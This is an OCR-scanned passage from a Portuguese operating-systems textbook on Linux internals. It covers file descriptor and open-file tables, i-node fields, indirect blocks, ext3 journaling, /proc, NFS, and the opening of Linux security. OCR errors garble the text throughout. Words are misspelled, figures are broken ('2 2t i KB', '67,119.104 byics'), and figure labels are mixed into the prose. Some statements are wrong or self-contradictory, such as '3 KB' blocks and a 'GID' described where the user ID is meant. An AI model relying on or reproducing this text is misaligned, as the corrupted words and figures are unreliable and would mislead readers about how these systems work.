reservados para uso futuro. A historia mostra qtic os bits 
nao utllizados nao permanecem assim por muito tempo. 

Vamos agora ver como o sistema le um arquivo + Lem- 
brc-se dc que uma cha mada tipica a uma rotina dc biblio- 
tcca para invocar uma cha mada dc sistema read sc parccc 
com algo do lipo: 

n - readffd, bufter, nbytes); 

Quando o micleo obtem o controle, tudo o que dc tern 
para inioializar sao esses tres parametros e a informaęao cm 
suas tabelas internas rclacionadas ao usuario. Um dos itens 
nas tabelas intern as e o veior descritor de arquivo. Ele c 
indexado pclos descritores de arqihvos e contem uma en- 
trada para cada arquivo a berto (atc um numero maximo, 
geralmente em torno de 32). 

A tdeia e comeęar com esse descritor de arquivo e fina- 
lizar com o i-node correspondente. Vamc>s considerar um 
possfyel metodo: simplesmente coloąue um ponteiro para 
o i-node na tabela de descritores de arquivos. Embora stm- 
ples, esse metodo infeiizmente nao fimdona. O problema e 
o seguinte: associado com cada descritor de arquivo existe 


uma posięao de arquivo que diz em qual byte a próxima 
leitura (ou escrita) deve comeęar. Onde da deveria estar? 
Uma possibilidade e coloca-la na tabela dc i-nodes. Entre- 
tanto, essa tatica falha quando dois ou mais processos nao 
reladonados tentam abrir simultancamcntc o mesmo ar- 
quivo, pois cada um tein sua própria posięao, 

Oma segunda possibilidade e colocar a posięao do ar- 
quivo na tabela de descritores dc arquivos. Dcssa maneira, 
lodo processo que abre um arquivo obtem sua própria po¬ 
sięao privada do arquivo. Infeiizmente, esse esquemo tam¬ 
bem pode falhar, mas a justificativa e mais sutil c constdera 
a naturcza do compartilhamento dc arquivos no Linux. 
Considcrc um script do sliell, s, constitufdo dc dois coman- 
dos, pi c p2 r quc sao executados cm ordem* Sc o scripi do 
shell e chamado pela lin ha de comando convencional 

s >x 

espera-se quc pi escreva sua safda em x e quc p2 escrcva 
sua safda ennr tambem, a partir do local onde pi parou. 

Quando o shell cria pl f zesta inicialmeme vazio, de 
modo que pi simplesmente inicia csercvendo na posięao 
0 do arquivo. Go ulu do, quando pi lermina, e necessario 
algum mecanismo para gara mir qtie a posięao inicia! do 
arquivo que p2 usa nao seja 0 {o que aconteceria se a po¬ 
sięao do arquivo fosse ma n ikła na tabela de descritores de 
arquivos), mas o va|or finał deixado por/tJ. 

A maneira como isso ć feiio pode ser obscrvada na Fi¬ 
gura 10.2L O segredo e itUroduzir uma nova tabela — a 
tabela de descrięao dearquivosahertos — entre a tabela 
de descritores de arquivos e a tabela de i-nodes, colocan- 
do a posięao do arquivo (e o bil de leitura/escriia) nessa 
tabela. Nessa figura, o pa i e o shell e o fil ho e primei.ro pi 
c depois p2. Quando o shell cria pl, a estrutura de usu¬ 
ario (incluindo a tabela de descritores dc arqutvos) delc 
ć uma cópia exaia da estrutura do shell c, assim, ambos 
os processos apontam para a mesma cni rada da tabela de 


Campo 

Bytes 

Descrięao 

Modę 

2 

lipo do arqutvo, bits de proteęao, setuid, bits setgid 

Nlinks 

2 

Nunnero de entradas no diretório apontanefo para esse i-node 

Uid 

2 

UID do proprietario do arquivo 

Gid 

2 

GID do proprietario do arquivo 

Size 

4 

Tamanho do arquivo em bytes 

Adcfr 

60 

Endereęo dos primeiros 12 blocos do disco e de tres biocos inefiretos 

Gen 

1 

Numero de geraęao (inerementado cada vez que o i-node e reutilizado) 

Atime 

4 

Hora do ultimo acesso ao arquivo 

Mtime 

4 

Hora da ultima mocfificaęao doarquivo 

Ctime 

4 

Hora da ultima alteraęao do i-node fexceto as out ras vezes] 


I Tabela 10.13 Alguns campos na estrutura de i-nodes do Liriux. 
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Tabela de 
descritores 
de arquivos 
do pai 

Tabefa de 
descritores 
de arquivos 
do fiiho 


Tabela de 
descritores de 
arquivcs < 
de processo 
nao relacionacfo 


Descrięao de 
arquivos abertos 


i-node 



sinnples 

Figura 10.21 A relaęao entre a tabela de descritores de arquivos, a tabela de descritores de arquivos abertos e a tabela de i-nodes. 


descrięao dc arquivosabertos. Quando/?/ termina, o dcscritor 
dc arquivos do shdl a ind a esta apontando para a descrięao dc 
arquivos abertos contcndo a posięao do arquivo de pL En- 
tao, ątiando o shdl tria p2 t o novo bibo antomaticameme 
herda a posięao do arquivo, sein que ele ou o shell lenham 
conhecimento de qual seja essa posięao. 

Contudo, sc umprocesso nao rdarionado abre o arqui- 
vo, dc obtem sua própria ultra da dc descrięao de arquivo, 
com sua própria posięao — preci samem e aquda dc quc ele 
necessiia. Assim o objeiivo maior da tabela de descrięao 
dc arquivos e pcrmilir quc pai c fiiho comparlilhem u ma 
posięao dc arquivo, mas fornecendo valores di fe ren ci a dos 
para os proccssos nao rdadonados. 

Voltando ao prablcnia de como executar read, agora 
sabemos como a posięao do arquivo c o i-node sao I ocali za- 
dos. O i-node comcm os endcreęos do disco dos primeiros 
12 blocos do arquivo. Sc a posięao inicial sc cnąuadra nes- 
ses 12 blocos, o bloco ć lido c os da dos sao copiados para o 
Lisuario. Para arquivos maiores do que 12 blocos, um cam- 
po no i-node contem o endereęo do disco de um bloco 
indireto simples, como mosira a Figura 10.21. Esse bloco 
contem os endcreęos de disco de mais blocos do disco. Por 
exemplo, se um bloco ć de 1 KB e um endereęo do disco e 
de 4 bytes, o bloco indireto simples pode conter 256 ende¬ 
reęos do disco. Assim, esse e$quema opera para arquivos de 
atc 268 KB no total 

Para valorcs superiores, usa-se um bloco indireto du- 
plo. Ele eon leni os endcreęos dc 256 blocos indiretos sim- 
plos. dos quais cada urn deles contem os endcreęos dc 256 


blocos dc da dos. Esse mccantsmo c suficicnte para tratar ar- 
quivos dc ale 10 + 2 lfi blocos (67,119.104 byics). Ainda as- 
sim, caso nao seja suficienie, o i-node icm cspaęo para um 
bloco indireto triplo, Sens ponteiros apontam para 
mu i tos blocos indiretos, Esse esąuema dc endereęamento 
consegue lidar com arquivos de umanho igual a 2 2t i KB 
blocos (16 GB}. Para blocos de 3 KB, o esquema de endere- 
ęa niemo da suporte a arquivos de ate 64 TB. 

O sistema de arquivos ext3 do Linux 

De forma a prcvcnir qualqucr perda dc dados após pa- 
radas do sistema e fal bas de energia, o sistema de arquivos 
ext2 lula de escrevcr os blocos de dados no disco assim 
que fossem criados. A la ten da decorrenie do movimcnto 
da cabeęa do disco na operaęao de busca {seek) seria tao alta 
que seria impossfvel tolerar o desempenho. Assim sendo, 
as escriias sao postergadas e as alteraęóes nao podem ser 
gravadas em disco antes dc 30 s, o que e um intervalo lon- 
go em sc tratando dos computadores atuais. 

Para mdhorara robustez dos sisiemas de arquivos, o 
Linux implementa um sistema de arquivos com diario. 
O ext3, u ma conti nuaęno do sistema dc arquivos exi2, 6 
um exemplo de um sistema de arquivos com diario. 

A ideia basica por tras desse tipo de sistema de arquivos 
e a manutenęao de um diario que descreve todas as opera- 
ęoes do sistema tle arquivos em ordem sequencial A escrita 
ordenada das a U era ęoes nos dados ou meiadados (i-nodes, 
superbloco etc.) do sistema de arquivos evita que as opera- 
ęoes sofram com movimentos excessivos de cabeęa de dis- 
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co durante acessosaleatorios. Evenuialmente, as alteraędes 
acabarao sendo escritas e gravadas no local apropriado do 
disco e, nesse caso, as emradas correspondemes no diario 
po dcm ser descariadas. Se urna parada dc sisiema ou falha 
de energia acontecer antes de as mudanęas serem gravadas, 
o sisiema ira dcteclar, na próxima inirializaęao, quc o sis- 
tema de arquivos nao foi desmontado corretamenie e, por- 
lanto, cruzara as informaęóes do diario com as do sisiema 
de arqnivos c lara as alteraędes dcscrilas no log do diario, 

O ext3 foi projctado para ser aliant en te compativel 
com o cxt2 c, na verdadc, todas as estrutnras dc dados 
principais c organizaęoes de disco sao as nicsmas nos dois 
sistemas. Alem disso, nm sistema dc arquivos que len ha 
sido desmontado como exi2 pode ser futura menie monta- 
do como exi3 e r assim, olerecer o recurso de diario. 

O diario c mn arquivo gerendado como um buffer rir- 
cular c quc pode ser armazenado no mesnio dispositivo ou 
ein um dispositivo separado daąnelc onde sc cncontra o 
sisiema de arquivos principal. Como as operaęoes de dia¬ 
rio nao sao, eias mes mas, registradas em um diario, nao sao 
gerendadas pelo mesmo sistema de arquivos ext3. Em vez 
disso, mn dispositivo de blocos para diario (jounialimj 
błock dtvici — J BO) separado e uiilizado nas operaęoes dc 
kitura/escrita do diario. 

O JBD da suporte a tres estrutnras de dados principais: 
o regisiro do didrh, o gerettciador de óperaęoes cnSmicas e a trart- 
saędo, Um regisiro do diario descreve urna operaęao de ba i - 
xo mvel do sistema dc arquivos, quc geralmeme resulta cm 
modificaęoes em um bloco. Como as chamadas de sistema, 
como write, englobam alieraęoes em divcrsos locais — i-no- 
des, blocos de arquivos existentes, novos blocos de arqiiivos, 
lisia de blocos livres etc. —, os registros de log afins sao agi u- 
pados cm operaęoes atómkas. O cxt3 noiifiea o JBD sobre o 
Micie e o finał do processaniemo de unia chamada de siste¬ 
ma, de forma que o JBD possa garantir que todos os registros 
do diario cm urna operaęao a tom i ca sejam apJkados ou que 
nenhum tkles seja considerado. Por Hm, e principalmente 
por razoes de didcncia, o JBD trata as colcęóes dc opera- 
ęoes alomicas como iransaędes. Os registros do diario sao 
armazenados conseaiiivamente demro de nma iransaęao. O 
JBD permiie que part es do diario sejam descariadas someme 
depois que todos os registros do diario pertencentes a urna 
iransaęao tenbam sido seguramente gravados em disco. 

Como a escrita de um regisiro do diario para cada mo- 
difkaęao de disco pode ser cara, o exi3 pode ser configurado 
de forma a manier um diario com todas as alieraęoes no 
disco, ou somente com as mudanęas rdadonadas aos meta- 
(1 ad os do sistema de arquivos (i-nodes f su per blocos, mapas 
de bits etc). A manutenęao do diario de metadados apenas 
causa menos sobrccarga no sistema, o quc resulta em me- 
lhor desempenho — embora nao forncęa garamia dc quc 
nao existirao dados de arquivo corrompidos. Diversos ou- 
tros sistemas de arquivos com diario mantem registros sobre 
operaęoes com metadados (por exempło, o XFS do SCI). 


O sistema de arquivos /proc 

Um omro sistema de arquivos do Einux e o sistema 
/proc (processo), u ma ideia originalmente projetada na 
oitava edięao do UNIX do Bell Labs e posieriormente co- 
piada para o 4.4BSD e para o System V. Contudo, o Li- 
nux estende a ideia de varias maneiras. O concelto basico 
visa cna u para cada processo no sistema, um diretório no 
/proc. O nomc do diretório ć o PID do processo cscrito como 
um nu mero dc dnia i. Por excmplo, /proc/619 c o diretório 
correspondcnte ao processo com PID 619, Nesse diretório cs- 
tao os arquivos que contem informaęóes sobre o processo. 
como sua linha de comandos, variaveis ambiemais e mas- 
caras de sinais. De falo, esses arquivos nao existem no dis¬ 
co. Quando eles sao lidos, o sisiema resgata as informaęóes 
do processo real conforme a necessidade, reiornando-as 
em um forma to-padrao. 

Muitas das cxtcnsocs do Linux rdacionam-se a outros 
arquivos e direlórios localizados no /proc Elas contem urna 
ampla vaiiedade de informaęóes sobre a CPU, pariięoes do 
disco, di$posuivGs, vetores de imemipęoes, comadores do nu- 
cleo, sistemas de arquivos / módulos carregados e muito mais. 
Os programas dos usuarios desprivilegiados sao capazes de 
ler essas informaęóes para aprender sobre o comportainen- 
lo do sistema de urna ma nęka segura. Alguns desses arqui- 
vos podem ser escritos para alterar os parametros do sistema. 

10-6.41 NFS: o sistema de arquivos de rede 

O Liso de redes tern sido um objetivo primordial no Li- 
nux e nos sistemas UNIX em geral, dcsdc o infcio (a primci- 
ra rede UNTX foi construida para Lransferir os novos nucie- 
os do PDF-11/70 para o Interdata 8/32 durante o processo 
de transportc do primciro para o segundo). Nesta seęao 
examinaremos o NFS [Nelwerk Fik System — sisiema de ar- 
quivos de rede) da Sun Microsystems, usado cm todos os 
sistemas Liniix inodcmos para juntar os sistemas de arqui- 
vos localizados em coinputadorcsseparadosem um sistema 
logicamcntc unifkado. ALuatrnente, a vcrsao dominantę do 
NFS ć a 3, introduzida em 1994. O NFSv4 foi apresentado 
em 2000 e ofcrcce diversas melhorias em relaęaoa arquiic- 
Lura NFS anierior. Tres aspectos do NFS sao imeressames: 
a arquiletura, o proLocolo e a implementaęao. Vamos agora 
comeęar analisantlo o eoniexto da ver$ao mais simples da 
versao 3 do NFSv3 e. em seguida, passaremos a urna breve 
discussao sobre as mdhoras incluidas na versao 4. 

Arquitetura do NFS 

A ideia basica do NFS e permitir que um conjunto 
qualquer de dientes e servidores compartilhe um sistema 
dc arquivos com u m. Em muitos ca sos, todos os dientes e 
semdores estao na incsma rede local, mas essa condięao 
nao e obrigatória. Tambem e possivd cxecutar NFS em 
urna rede de longa distancia caso o servidor esteja longe 
do diente. Para simplificar, pensa rem os em dientes e ser- 
vidores como se eles fossem maąuinas distintas. mas, na 
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verdade, o NFS permite que cada miquma seja diente e 
senldor ao mesnio tempo. 

Cada servidor NFS exporia urn ou mais de sens diretó¬ 
rios para serem aeessados pelos dientes remotos. Quando 
um diretório e di spo nib il Iza do, o me sino acontece com to- 
dos os scus subdirctórios c r norma) men te, todas as arvores 
de diretórios sao exportadas como urna só unidade. A Eista dc 
diretórios que um servidor exporta e mamida em um. ar- 
quivo — muitas vezes o fetcfexport$ — de modo que esses 
diretórios possam ser exportados automat i camente sempre 
que o servidor seja reinidado. Os dientes acessam os di¬ 
retórios exportados moniando-os localmente. Quando um 
clientc monta um diretório (remoto), essc diretório lica fa- 
zendo parte de sua Merarąuia de diretórios, como mostra 
a Figura 10.22. 

Nesse cxcmplo, o diente I montou o diretório hin do 
servidor 3 em seu proprio diretório hin t\ agora, ele pode 
chamar o shell usando fbinhK obtendo o shell no servi- 
dor 1. As estaęoes de trabalho sem dis cos muitas vezes 
dispoem somente de um esqueIeto do sistema de arquivos 
{na RAM) e obtem todos os sens arquivos dos senddores 
remotos, como esse esemplo. Da mesma maneira, o dien¬ 
te 1 montou o diretório /projetes do servidor 2 em seu di¬ 
retório fusr/astftrabalho e, assim, agora ele pode acessar o 
arqinvQ a via /usr/ast/trabalho/proj 1 fa . Por firn, o diente 2 
ta mb cm montou o diretório proje tos e tambem pode acessar 
o arqtiivo a usando imntfprojUa, Co n formę visto aqui, o 
mesmo arquivo pode ter diferentes nomes nos diferentes 
dientes, pois eles sao momados em um local diferente nas 
respectivas arvores de arqnivos. O ponto de montagem e 
totalmente local aos dientes; o servidor nao sabe onde ele 
ć montado cm ncnluim de sens dientes. 


Protocoios do NFS 

Visto que um dos objetivos do NFS e da suporte a um 
sistema heierogeneo, com dientes e servidores capazes de 
executar sistemas operacionais diferentes em hardwares 
diferentes, e essencial que a interface entre os dientes e 
os servidores seja bem defmida. Somente assim e possfvel 
a quaiquer um escrever u ma nova implementaęao diente 
e esperar qtic da funcione corretamente com os scrvidorcs 
existcntcs c vicc-vcrsa. 

O NFS atinge esse objetivo definindo dois protocolos 
cliente-servidor. Um protocolo e um conjunto de solid- 
tacoes eiwiadas pelos dientes aos servidores, bem como as 
respostas correspondentes enviadas de volta dos servidores 
aos dientes. 

O primeiro protocolo NFS trata da montagem, Um 
diente pode enviar um nonie de caminho para um servi- 
dor e solicitar permissao para montar aquele diretório em 
aigum lugar em sua hierarquia de diretório. O local onde 
ele deve ser montado nao e contido na mensagem, pois o 
servidor nao se preocupa com isso. Se o nonie do caminho 
e valido e o diretório especificado Fol exportado, o servidor 
retorna um controle de arquivo {fik handle) para o dien¬ 
te, O controle dc arquivo contcm campos quc idcntiHcam 
de modo u ni co o tipo do sistema dc arquivos, o disco, o 
nu mero do i-node do diretório e as informaęóes de segu- 
ranęa, As chamadas subseąuentes para a leitura e a escrita 
em arquivos no diretório montado ou em qua)quer um de 
seus su b diretórios u sam o controle de arquivo. 

Guando o Linux inidaliza, de cx ccii ta o script do shell 
ktcfrc antes de operar no modo muitiusiiirio. Os coman- 
dos para montar os sistemas dc arquivos remotos podem 
ser colocados nesse script, permitindo, assim, a montagem 
automatica dos sistemas de arquivos remotos neeessarios 


Cliente 1 Cliente 2 



I Figura 10.22 Exemplos de sistemas de arquivos remotos montados locamente. Os diretórios sao represeotados por ąitadrados. e 
os arquiv/os K por circulos. 
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ant es de pemiitir que os usuarios acessem o sistema. De 
maneira a1ternativa, muitas vers5es do Linux tambem dao 
suporte a automontagem. Essa caractenstica penrnte que 
uni conjunto de diretórios remotos seja associado a um di- 
refório local. Nenhuni dcsses diretórios remotos e montado 
(ou sens scrvidores contatados) quando o diente c inicia- 
lizado, Em vez disso, na primeira vez quc uni arquivo rc- 
moto ć a bert o, o sistema opera tional envia uma mensagem 
para cada uni dos semdores, O primeiro a responder vence 
e sen diretório e montado. 

A automontagem tem duas vantagcns principais so¬ 
bie a montagem estatica leita pelo arquivo fetc/rc. Pri- 
mciro, se um dos semdores NFS definidos no referido 
a i qu ivo esta incomunicavel e impossfvd al iva r o diente — 
pdo me nos nao sem alguma difkttldade, certo atraso c 
algumas mensagens de erros. Se o usuario nao precisa da- 
quele servidor naąuele dado moment o, todo o i raba i ho e 
desperdięado. Em segundo lugar, permitir que o diente 
tciiie um conjunto de semdores em paralelo possibilita 
alcancar certo gran de tolerancia a fallias (pois somente 
um deles precisa estar ativo) e o desempenho pode ser 
melhorado (escolhendo o primeiro que responder — pos- 
sivclmcnte o menos carrcgado). 

Por outro lado, supoe-se impliriiamente que todos os 
sistemas de arquivos especificados como akernativas para 
a automontagem sejam identteos. Visto que o NFS nao 
fornece nenhuni suporte para a replicaęao de arquivos ou 
diretórios, ele delega ao usuario gara mir que todos os sis¬ 
temas de arquivos sejam os mesmos. Consequen£emeiite, 
a automontagem muitas vczes ć usada para sistemas de ar- 
quivos do lipo somente Icitura, comcndo bitiarios do sislc- 
ma e oulros arquivos que ra ram en te sao aiterados. 

O segundo prolocolo NFS e para o acesso a arquivos 
e diretórios. Os clientes podem enviar mensagens para os 
semdores para manipular diretórios, ler e escrever em ar- 
quivos. Alern disso, des podem aeessar atributos dos arąui- 
vos, como o modo, o tamanho e a hora da ultima modiftea- 
ęao. Muitas chamadas de sistema Unux sao suportadas pdo 
NFS — com as exceęoe$ surpreendcntes de open e close. 

A exclusao de open e close nao oeorre por acaso. Alias, e 
totalmente intenrional. Nao e necessario abrir um arquivo 
antes de le-lo, nem fecha-lo depois de lido. Em vez disso, 
para ler um arquivo, um diente envia a o servidor urna men- 
sagem lookup contendo o nonie do arquivo, com uma soti- 
citaęao para procura-lo e ret o mar o controle do arquivo — 
quc e uma estru tura que idcmilica o arquivo <isto e, eon- 
tern u m kkntifteador do arquivo c o nu mero do i-node, 
entre ouiros da dos). Diferentemente de uma chamada 
open, essa operaęao lookup nao copia qualquer inbrmaęao 
para as tabelas internas do sistema. A chamada read contem 
o controle de arquivo do arquivo a ser lido, o deslocamento 
dentro do arquivo no qual inidar a leitura e o mi mero de 
bytes desejado. A vantagem desse esąuema e que o ser- 
vidór nao tem de relembrar tu do sobre as conex5es open 


entre as chamadas. Assim, se um servidor quebra e depois 
se recupera, nenhuma informaęao sobre os arquivos as- 
sodados a abrir arquivos e perdida, pois nao ha qualquer 
informaęao. Um servidor como esse, quc nao mantem 
a informaęao do estado dos arquivos associados a abertura 
dc arquivos, ć conhccido como sem estado (statekss). 

Infelizmeme, o metodo NFS dificulta a utilizaęao exa- 
ta da semantica do Linux para arquivos. Por exemplo, no 
Linux uni arquivo pode ser aberto e travado, de modo que 
outros processos nao possani acessa-lo Quando o arqui- 
vo e fechado, as travas sao libcradas. Em um servidor sem 
estado, como o NFS, as travas nao podem ser assoriadas a 
arquivos abertos, pois o scrvidor nao sabe quais arquivos 
cslao abertos. Portanto, o NFS precisa dc um mccanismo 
adicional c sępa rad o para tratar travas, 

O NFS usa o mecanismo de proteęao padrao do UNiX, 
com os bits rwx para o proprietario, o grupo e outros (men- 
donados no Capitulo 1 e discutidos em detalhes a dianie). 
Originalmente, cada mensagem dc solicitaęao apenas con- 
tinha os lDs do usuario e grupo do chamador, os ąuais o 
NFS usava para validar o accsso* Na verdadc, conhava-sc 
que os clientes nao fossern trapacear, A expcricnda de va- 
rios a nos most mu segu ranienie que essa suposięao era — 
digamos — ingenua. Atualmente, a criptografia por chave 
publica e um recurso possivei para estabelecer uma cha- 
ve segura para a validaęao do diente e do senidor em 
cada pedido e resposta. Quando essa opęao esta habilitada, 
um diente mal-iotendonado nao pode passar por um ou¬ 
tro diente, pois ele nao sabe a chave publica desse outro. 

Imptementaęao do NFS 

Embora a implemcmaęao dos códigos do diente e do 
$ervidor seja independeme dos protocolos do NFS, a mato* 
oa dos sistemas Linux usa urna implementaęao em tres ca- 
madas similar aquda da Figura 10*23. A camada superior 
ć a camada de chamadas de sistema. Essa camada trata de 
chamadas como open, read e close, Apóś anatisar situ alka¬ 
nie me a chamada c verificar os parametrom cla invoca a 
segunda camada, a do VFS {virtual file system — sistema de 
arquivo virttial). 

A tarefa da camada VFS e manier uma tabela com 
uma entrada para cada arquivo aberto. A camada VFS 
tem uma entrada, chamada de v-node (ou knode vir- 
tual), para cada arquivo aberto. Os v-nodes informam se 
o arquivo e local ou renioto. Unia quantidade suficiente 
de informaęao e fomecida sobre os arquivos remotos para 
permitir accssa-los. Para os arquivos locais, sao registra- 
dos o sistema de arquivos e o i-nocie, pois os sistemas Li- 
nux modernos podem dar suporte a varios sistemas de 
arquivos (por exemplo, ext2fs, /proc, FAT etc.). Embora 
o VFS tenha sido inventado por causa dor NFS, a maio- 
ria dos sistemas Linux atuais agora tem o VFS como uma 
parte integral do sistema operacional, mesmo quando o 
NFS nao e lisa do. 
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Nddeo do cllente Nticteo do serwidor 



] Figura 10.23 A esirutura de camadas do NFS. 

Para ver a aplicaęao dos v-nodes, vamos acompanliar 
uma seąuenda de chamadas de sistema mount, open e nead. 
Para montar urn sistema de arquivos rcmoto, o adminisira- 
dor do sistema (ou /etc/rc) chama o programa mount espe- 
cificando o diretório remoto, o diretório local sobre o qual 
de deve ser moniado e o u tras informaęoes, O programa 
mount analisa sintaticamentc o nonie do diretório rcmoto 
a ser moniado e descobre o norne do semdor NFS no qual 
o diretório remoio esta local iza do. Entao, ele coniata esse 
semdor pedindo-lhe um comrole de arquivo para o referi- 
do diretório remoio. Se o diretório existe e esta dispomvel 
para montagem remota, o semdor retorna o comrole de 
arquivo sollcitado. Por (im, de faz uma chamada dc siste¬ 
ma mount passando o controle ao nu cle o* 

O nucleo entao eon stroi um v-node para o diretório 
remoio e pedc ao código do clieme NFS da Figura 10,23 
para criar um r-node (i-node remoto) em suas tabelas 
internas a firn de comer o controle de arquivo. O v-node 
aponta para o r-node, Cada v-node na camada do VFS eon- 
tera ou um pontdropara um r-node no código do dientc NFS 
ou um pomeiro para um i-node em um dos sisicmas de ar- 
quivos locais (mostrados como linhas iracejadas na Figura 
10.23), Assim, por meio do v-node e posswel verificar se 
um arquivo ou um diretório ó local ou remoio, Se for local, 
o sistema dc arquivcs e o i-nodc poderao ser localizados. Se 
for remoto, o hospedeiro remoto e o controle de arquivo 
poderao ser lotalizados, 

Quando um arquivo remoto e aberto em um clieme, 
em algum ponto durante a aoalise sintatica do nome do 
caminho, o micleo encontra o diretório sobre o qual o sis¬ 
icma de arquivos remoto esta montado. Ele vc que esse 
diretório e remoto e no v-node do diretório encomra um 


ponteiro para o r-node. Ele, entao, pede que o código do 
dientc NFS abra o arquivo. O código do cliente NFS pro¬ 
co ra na poręao remanescente do nome do caminho sobre 
o servidor remoto associado ao diretório moniado c obiem 
o controle de arquivo para ele. Ele faz um r-node para o 
arquivo remoto em suas tabelas e relata para a camada do 
VF5, a qual coloca em suas tabelas um v-node para o ar- 
quivo que aponta para o r-node. Novameme, vemos aqiu 
que todo arquivo ou diretório aberto tern um v-node que 
aponta ou para um r-node ou para um Pnode. 

O chamador recebe um descritor de arquivo para o ar- 
quivo rcmoto. Esse descritor dc arquivo e mapeado sobre o 
v-node pelas tabelas da camada do VFS. Notę que nenhu- 
ma entrada da tabela e feita do lado do semdor. Embora 
o semdor esteja p rep a rad o para fornecer controles de ar- 
quivos medianie requisięoes, ele nao mantem o registro dc 
quais arquivos tern controles dc arquivospendcntes c quais 
nao. Quando um comrole de arquivo e enviado a ele para o 
acesso ao arquivo, de yerifica a validadc do controle e, caso 
seja valldo, usa-o. A valklaęao pode indu i r a verificaęao de 
uma chavc de autenticaęao contida noscabeęallios do RPC, 
caso a seguranęa esteja ativada. 

Quando o descritor de arquivos e u sad o em uma cha- 
mada de sistema subseąuente — por exemplo r read —■, a 
camada do VFS localiza o v-node correspondemc e deter- 
mina se o descritor e local ou remoto e tambem qual i-node 
ou r-node e usado para de$creve-lo. Entao, de envia uma 
mensagem para o semdor contendo o controle, o desloca- 
mento do arquivo (que c rnantido do lado do dientc c nao 
do lado do servidor) e o co ma dor de bytes. Por razoes de 
eficienda, as transfcrencias emrc o servidoi c o dientc sao 
feitas em grandes blocos — normalmente 8.192 bytes —, 
irresmo que poucos bytes sejam requisUados T 
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Guando u ma meiisagem de requisięao chega ao ser- 
vidor, ela e passada para a camada do VF5, que determina 
qnal sistema de arquivos local contem o arquivo soliritado. 
En ta o, a camada do VFS faz uma chamąda de sistema de 
«irquivo$ local para ler e retomar os bytes, Esses dados sao, 
eruao, passados de volta ao eliente. Após a camada do VFS 
do dicntc ler obtido o bloco dc 8 KB que pedlu, cla anto¬ 
ni a tira men te emitc uma reąuisięao para o proximo bloco, 
supondo quc esic sera necessario cm brcvc. Essa caracte- 
rfslica, conhecida como leitura antecipada, mclhora o 
desempenho consideravd menie, 

Para as escritas, um caminho amlogo e seguido desde 
o eliente atć o servidor. Aleni disso, as transferencias tam¬ 
bem sao fcitas cm blocos dc 8 KB. Sc uma chamada dc sis- 
tema write fornccc menos do quc S KB dc dados, estes sao 
apenas acumulados local menie, O bloco todo de 8 KB só ć 
enviado ao servidor quando esia cheio, Contudo, ąuando 
um arqinvo e fechado, todos os seus dados sao enviados 
para o servidor i media ta menie. 

Outra tecnica para mdhorar o desempenho e o uso de 
ca che, como no UNIX corwenrional Os scrvidores colocam 
os dados em caches para cviiar os accssos ao disco, mas isso 
e invis(vel aos cliemes. Gs clientcs mantem duas caches, 
unia para airibiuos dos arquivos (i-nodes) c omra para os 
dados dos arquivos. Guando tini i-nodc ou um bloco dc 
arquivo e necessario, realiza-se uma verfficaęao para con- 
firmar se ele pode ser obiido da ca che. Hm caso afirniaiivo, 
o trafego de rede pode ser evitado. 

Ao mesmo tempo quc o uso dc caches nos clientcs ajli¬ 
da bastante o desempenho, ele tambem introduz alguns 
próbie mas dcsagradavcis. Suponha que dois dientes estejairi 
ambos usando o mesmo bloco de arqnivo cm suas caches 
locais e quc um deles o modifiqiie. Guando o outro le o blo¬ 
co, ele obtem o valor antigo (sta/e), A cache nao e coerente, 

Dada a gravidade desse próbie ma, a implementaęao de 
NFS lenta aienua-lo por meio de varias soluęoes. Por exem- 
plo, assodado a cada bloco da cache existe um temporiza¬ 
dor, Guando o temporizadorexpira, a entrada e dcscanada. 
Normalnienie, o temporizador e dc 3 s para blocos dc dados 
e de 30 s para blocos de diretórios* Isso reduz um pouco 
os riscos. Alem disso r sempre que um arquivo operado em 
cache c aberto, uma mensagem ć ciwiada ao servidor, a firn 
de descobrir quando o arquivo foi allerado peta ultima vez. 
Se a ultima modificaęto ocorreii após a cópia local ter sido 
trazida para a cache, a cópia da cache e descartada e uma 
nova cópia e bnscada do scrvidor, Por firn, um temporizador 
de cache expira uma vez a cada 30 s, e todos os blocos sujos 
(isio e, modificados) da cache sao enviados para o serndor. 
Apesar de essas medidas serem meros paliativos, o sisiema 
l u n ci on a niuito bem na ma i orla das circunstancias praticas, 

NFS versao 4 

A vcrsao 4 do NFS foi projetada para simplifkar cer¬ 
ta s opera ęoes dc scu predecessor. Em comparaęao com o 
NFSv3, descrito anteriomienle, o NFSv4 e um sistema de 


arquivos com estado, o que permite que as operaęoes 
open sejam chamadas a parlir de arquivos remotos, pois o 
servidor NFS remoto maniera inna estru tura relacionada 
ao sisiema de arqiiivos quc indu i atc o ponteiro para arqui- 
vo, As opcraędes dc leitura nao precisam incluir falxas de 
leitura absolutas, maspodem ser gradativamente aplicadas 
a partir da posięao do ponteiro de arquivo anteiiou Essc 
procedimento resulta cm mensagens menores e tambem 
na habilidade de empacotar miiltiplas operaęoes NF£v3 em 
uma unica transaęao de rede. 

O fato dc o NFSv4 ser um sistema de arquivos com 
estado facilita a Integra ęao dos diversos protocoios NFSv3 
dcscritos anteriomienle em urn tinico protocolo coerente, 
Nao ha necessidade de dar su porte a protocoios diferemes 
para operaęoes de montagem, cache, bloqucio ou seguran- 
ęa. O NFSv4 tambem funciona melhor com a semamica 
dos sistemas de arquivos tamo do Ltmix (e no UN1X em 
geral) quanto do Windows. 



Seguranęa no linux 


O Linux, como clone do MfNlX e do UNIX, tein sido 
um sisiema imiltiusuńrio quase desde seu infcio. Isso signi' 
fi ca que a seguranęa e o controle da informaęao foiarn eni- 
butidos no sistema ha niuito tempo. Nas seęoes a seguir, 
veremos alguns dos aspectos de seguranęa do Linux. 


10.7.11 Conceitos fundamentais 

A corruinidade dc usuarios cm um sistema Linux ton- 
sisie em alguns usuarios registrados, cada um deles com um 
UID (ID do usuario) unico. Um GID e um mimero imeiro 
entre 0 e 65.535. Os arquivos (mas tambem processos e ou- 
iros recursos) sao marcados com o GID de seu proprieiario. 
For coiwenęao, o proprieiario dc urn arquivo e a pessoa que 
o criou, embora exisia um meio de tiocar a posse. 

Os usuarios podem ser organizados em grupos, que 
tambem sao numerados com inieiros de 16 bits, chamados 
GIDs (IDs do grupo). A associaęao de usuarios em gru¬ 
pos e leita manualmente (pelo administrador do sistema) e 
consiste na inseręao de entradas em uma base de dados do 
sistema para informar quais usuarios estao em quais gru¬ 
pos. Um usuario poderia estar em um ou mais grupos ao 
mesmo tempo. Para slmplificar, nao iremos a fundo nessa 
caraclcnstica* 

O mecanismo de seguranęa basico do Unux e simples. 
Cada processo carrega o UID e o GID de seu proprieiario. 
Guando um arquivo e criado, ele obtem o GID e o GID 
do processo criador. O arquivo obtem ainda um conjun- 
